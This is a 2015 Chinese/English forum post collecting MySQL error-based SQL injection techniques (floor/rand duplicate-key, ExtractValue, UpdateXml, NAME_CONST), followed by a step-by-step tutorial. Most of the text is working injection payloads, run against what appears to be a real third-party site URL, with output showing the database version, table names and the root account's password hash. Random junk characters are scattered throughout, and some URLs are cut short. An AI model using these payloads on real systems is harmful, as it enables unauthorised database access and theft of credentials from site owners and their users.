|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:
* @2 |- e. j7 {/ c3 j首先进行正常查询: mysql> select * from article where id = 1;( j1 E8 Y& F" p6 m
+—-+——-+———+0 a5 f0 q2 |6 K
| id | title | content |0 \, }6 n# o) B+ Q
+—-+——-+———+
c! A' E0 k& t" H| 1 | test | do it |
; [1 C- }; C% z# J; P9 n( {+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);- @9 F. J( }% G& E; h6 w: E$ V8 F
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。2 J6 f% K# E7 ~# }' }& t
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
5 N- d2 G- e' f+ t2 J1 E, _1 Z) GERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));3 m6 r" ]! \! x% A! J
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue5 m$ \. p5 Q+ H( L, ^; @
测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–2 s' D" E" v2 _
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
/ y& I& X4 J7 z8 Z% S! [9 S9 u+ k8 A$ d# m ^" r% {& H4 ?' @
再收集:
4 q( m( ?4 `$ c" w* thttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) ! n* i1 w/ d, m
8 z+ N D3 J( l2 m S" C# j3 V
Error uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
! }8 m' A7 Z! X+ f% w. I
6 F, V8 l, \7 l$ lhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
$ s* |0 A; A K8 Q$ h1 C
# C4 J- H$ t. _; W jErroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ 2 L W" a$ ^9 O3 ]
6 X- I' q! p. D9 O, x. vMYSQL高版本报错注入技巧-利用NAME_CONST注入
* J" E4 X% I* x# w- Q$ OIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
8 I* a7 \( J& p3 {0 |
2 F) v1 X2 V- p7 Q7 s. J% q
0 T; K- {/ D; @$ t: F相关信息8 V+ ^% U- M$ i. D
$ `2 \; S: M$ Q7 m; }
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.5 }* _9 D" v3 f1 q* l8 M6 l
! P/ e4 k7 U+ V( |5 {4 v# JCode:9 W* G( V9 s* c5 d8 t# I
NAME_CONST(DATA, VALUE)9 Q* t% N2 O: |( e) y5 w
$ R! i" n/ I3 G o& N4 d ~Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
4 l4 z3 Y; _2 E; l$ S
! n" v d4 C& g P5 I+ rSELECT NAME_CONST('TEST', 1)# e% R: W5 j+ I: z
: G4 S! Q5 t1 C+ j
+ z* y3 E4 K5 u: |, m: h
: m3 x$ }) I$ k|---------------|
) m! U; O- \" n! s| TEST |4 b% q4 s% t h' f
| |8 q( F6 e6 u% _& T8 h2 K+ E! \* D) G
|---------------|- A Z; b6 f. T
| 1 |% g' d8 @: g1 m
| |5 q7 W" @/ D+ v0 \# l' r$ e+ O
|---------------|; v4 ?8 @2 H) b/ Z4 m# ]9 O- h" B
" ?4 e* a' Q) m( s1 ]1 m
$ {3 i6 z0 j6 b+ z2 J( M6 V$ ^7 u! ~8 d3 _3 J) Y; {
$ P D9 W7 x: s( U0 P$ b0 Q: v3 nhttp://dev.mysql.com/doc/refman/5.0/en/m...name-const' o1 n1 m, Q( s, R5 K: T% `
Intro to MySQL Variables4 |' n; |: o) L, ?
: b. P1 `5 m: jOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
2 x2 T& s2 J; b1 P) G" V5 {1 x7 Q f
Code:
S9 w7 o2 k0 ~5 l. e# whttp://www.baido.hk/qcwh/content ... ;sid=19&cid=2611 I* c. l" H( h- w q# ^$ W
]! j2 C# I0 ?5 q8 W2 `4 ]
4 w+ M$ M; D- }5 P' O
@" W' z B: s' u8 L; ~
% b9 m M& p0 A
- o$ c) w) x$ z8 s. Y: n; F8 gCode:. @; F o; t h* ^
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
9 g1 J0 j( X) K7 e# _5 B/ }4 ?
& s3 Z. x) i$ J- m" ?2 u' G0 k- j, l/ q; |) W3 q1 W. \
VAR = Your MySQL variable.
) K" k" g, O- _8 o; z9 {
) @+ i6 J) e# T9 W6 t" |4 u7 uMySQL 5.1.3 Server System Variables
7 Q1 t4 O6 X, q4 i$ |- r0 I7 B/ U9 E$ W# N" T3 Z' ]
Let's try it out on my site..
) Y4 h5 H/ q) z. \
: E6 ?2 M: U# Q* Z5 l g; zCode:
8 m: G6 X- R' Q4 q7 xhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--1 d2 }0 b1 K, h$ {/ h& B
# s# ~+ _1 c$ W9 @( S) X/ l1 ?Erroruplicate column name '5.0.27-community-nt'
( _* i X, `. L
7 N2 C# f, T) R* A/ t. Q; x# M7 n
. F# ~% ]* d1 ^' a& y' A
* l/ x0 b. M P q9 l$ o
9 D4 f; m9 T! Z9 Z) w! ONow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
/ m7 r- j! p' x% {, g7 X- U. S* G1 b) J2 W) @) \ c
Data Extraction8 x+ T" D, X% E
8 R J# ~% T& H5 n3 d- DCode:
5 o3 o; _ l# p" t. Q# I' m9 v+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--2 Q0 A; {: W7 U
1 r1 p2 N' Z5 _0 I) e1 j; L. |1 I |/ `
We should get a duplicate column 1 error...6 `/ x6 V! y- F
' V* e. L- u+ s! n1 o! d' \Code:, n; M6 K3 L3 h! \- i
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
9 f2 p8 v3 O# l" i. S+ t' Q6 _' |8 @$ q2 ?' Y9 B
Erroruplicate column name '1
% V8 w8 c4 A/ _' z& ~6 x- x6 ? f$ N: ^0 _7 w: ^) |& Z
/ Y! v2 g# K1 G2 U- K/ r9 M1 x7 ?8 D
8 [6 E. Y" n1 T" F) `8 R! x
- y3 e7 v, Z1 I2 N" [; X1 n' q" d( ~, \6 ^" i6 C$ v5 _! _5 ]- {
" p" B, E; `9 e
Now let's get the tables out this bitch..
( x5 s! }& X \
* F+ l1 i: \/ [$ B8 ]Code:
+ b& ~5 x8 I# m9 V/ d( a+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--+ m" t, }5 W, }- h1 v+ q
8 P9 o. D: D$ I. ?% H* @ u1 O
" |+ z; x# q; m- B3 j0 S dLet's see if it works here, if it does, we can go on and finish the job.# u. W5 S2 y1 m
9 {4 z' D! G4 d0 PCode:' d8 I$ N" O( @( @, A
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--6 g/ `! n8 H# V8 v* B* P
K u6 i; Q9 Z; H$ |& [+ R# b0 I4 b1 d3 ^
Erroruplicate column name 'com_admanage
/ J. A+ K9 K1 `: `/ N
- W6 Q S2 ]0 d+ {2 ~" J% J9 @9 A0 z; S7 m) x
/ f8 p; ?- N4 A5 j1 Z+ P( F9 @& K" S3 @8 V
6 _ F, U6 N2 t; ?2 G
7 S1 Y1 l$ y0 E7 l
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.& ~: @+ C/ j; d: T7 @/ J* W
" w- b# T% l! [ n2 @( w4 LLet's get the columns out of the user table..! {- @" {5 ^& t+ p7 h
) @1 U! {$ F9 O. V' d$ w4 J( N: h
Code: i9 _$ I w* Y8 _& f: D1 h* ^
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
6 N2 U$ z9 H* y( i0 ^) F$ u) p- I8 ? y& _4 |; M
: I+ F& y& N! k: aSo mine looks like this, and I get the duplicate column name 'Host'.) i! y- k3 [. R9 u
) [3 Y! c+ R4 @5 Y: p0 UCode:& v! x& f* K a( ]2 J5 k* S
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--+ K( l/ \1 D4 g9 M6 A
: c, m; B. j; F
Erroruplicate column name 'Host'
. b6 J3 M' `% ~2 K! w
/ U3 B* g2 Z: j; D0 [3 A i: W p. ^& a o G
/ `4 z- T0 U$ b( ^( r
- B0 v3 D! O# H$ _7 A
3 q* I! h' ~. ~! D2 i% \+ Z: \. s& f+ _- z- v! O: V. r9 G
Woot, time to finish this bitch off./ W- W: N9 P1 O: Y. i
/ c8 `* q9 q s( S2 U* H6 X
Code:
5 R' f, U& ^- ?3 _6 P7 I' D+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--* C A- {% q, y! X: l' R. ^
& {/ E6 g: s* K+ P
7 y7 s- _2 h$ r4 N' D% B* @' S& m
So mine looks like this...
; _5 n" K' ~$ Q. K2 B8 \: ]7 ^
% L& N! Q0 L8 T `+ RCode:
9 n3 a' u! Y" z$ n4 Phttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--# y6 f7 y$ ]5 Z$ ~( r
3 N$ G3 s0 ^0 G- S! G7 r
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'8 ~9 r* J8 i4 b6 j+ u, P: Q) P
% C0 A+ K6 w& E* p$ t2 t$ j9 _- |7 B4 [, H+ N F3 z. Q
& o- {5 B+ d4 G$ ]; c& d
' d! l/ m' @$ O9 x% V4 @) W: i/ b) c$ t
% m' p# h- \* o, s3 P6 O# \
And there we have it, thanks for reading./ J' ~ L( M& e# N/ W L7 F
7 Y; ^8 s7 h' }& e' B" T# d
|
发表于 2015-11-11 19:03:37
收藏
支持
反对